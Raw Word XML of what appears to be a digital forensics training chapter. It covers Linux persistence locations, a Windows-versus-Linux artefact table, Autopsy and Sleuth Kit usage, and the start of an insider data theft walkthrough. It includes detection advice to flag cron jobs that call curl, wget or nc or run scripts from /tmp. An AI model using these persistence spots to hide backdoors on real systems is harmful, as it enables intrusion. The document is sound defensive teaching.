          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Home directories of new users, accounts with no password or with login shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when they should be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/nologin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron jobs and other persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the Linux task scheduler. A cron job runs commands at a set time or interval. It is a legitimate administration tool, but it is also a favourite way for attackers to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">keep access (persistence)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — for example a job that re-downloads a backdoor every five minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">System jobs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</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/etc/cron.d/</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/etc/cron.hourly|daily|weekly|monthly/</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User jobs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/crontabs/&lt;user&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/&lt;user&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), listed with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab -l -u user</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Look for jobs that run scripts from /tmp or hidden folders, call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or were recently added.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Other persistence places: systemd services (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/systemd/system/</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/etc/rc.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, shell start-up files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.bashrc</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.profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), and new SSH keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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3655"/>
        <w:gridCol w:w="3654"/>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Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Linux</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system / key metadata</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NTFS — MFT</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ext4 — inodes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Central configuration</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Registry</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Configuration files in /etc</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Authentication logs</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 event log (4624, 4625…)</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/var/log/auth.log or /var/log/secure</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Command history</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Artefacts (PowerShell history, Prefetch, UserAssist)</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~/.bash_history</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Scheduled tasks</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Task Scheduler, Run keys</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cron, systemd timers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Login history</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Event logs, SAM</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last, lastb, wtmp/btmp</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 artefacts</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Event logs, netstat in memory</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/proc/net/tcp, ss/netstat</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Deleted-file recovery</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Easier (inactive MFT record)</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Harder (inode pointers cleared)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8 Forensic Tool Overview — Autopsy, Sleuth Kit and FTK</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42"/>
        <w:gridCol w:w="2144"/>
        <w:gridCol w:w="5360"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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w:t>
            </w:r>
          </w:p>
        </w:tc>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53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Main uses</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Autopsy</w:t>
            </w:r>
          </w:p>
        </w:tc>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Free GUI platform (built on the Sleuth Kit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Create a case, add an image (E01/RAW), run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ingest modules</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (file-type ID, deleted files, keyword search, recent activity, web history, registry, hash lookup), view timeline, tag evidence, generate report</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The Sleuth Kit (TSK)</w:t>
            </w:r>
          </w:p>
        </w:tc>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Free command-line library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5360"/>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mmls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (partition layout), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fsstat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (file-system info), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (list files incl. deleted), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">istat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (inode/MFT details), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">icat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (extract file by inode), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">tsk_recover</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (recover deleted files)</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FTK (Forensic Toolkit)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and FTK Imager</w:t>
            </w:r>
          </w:p>
        </w:tc>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Commercial suite; Imager is free</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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FTK: fast indexing, searching, email and registry analysis, reporting. FTK Imager: acquisition and preview</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EnCase</w:t>
            </w:r>
          </w:p>
        </w:tc>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Commercial suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Acquisition, analysis, scripting and court-accepted reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Typical Autopsy workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Autopsy workflow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rPr>
          <w:cantSplit/>
        </w:trPr>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Create case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Add data source (.E01)</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Run ingest modules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Review artefacts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Timeline &amp; tagging</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Generate report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Sources → file tree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: browse files; deleted files are shown with a red mark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Extracted content — Recent Documents, Web History, Installed Programs, USB Devices, Run Programs, Operating System Information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keyword Search</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Hash Lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to narrow down large images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view events by day/hour; export to CSV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tags and Reports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — tag key items; the report lists them with source and path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9 Hands-On Case Scenario Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario A — Insider data theft on a Windows workstation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Background:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A confidential price list (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pricing_2024.xlsx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) was found with a competitor. The suspect is employee “Rahul”, who resigned last week. His workstation was seized and imaged (hash verified). The question: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Did Rahul copy the file, when, and how?</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780"/>
        <w:gridCol w:w="2534"/>
        <w:gridCol w:w="3606"/>
        <w:gridCol w:w="2826"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Artefact checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Finding (example)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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rPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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 log (4624)</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Rahul’s interactive logon at 23:31 on 5 March</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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He was present after office hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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$MFT / file system</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pricing_2024.xlsx accessed 23:40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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was opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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RecentDocs / LNK / Jump Lists</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LNK shows pricing_2024.xlsx and a second LNK for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">E:\pricing_2024.xlsx</w:t>
            </w:r>
          </w:p>
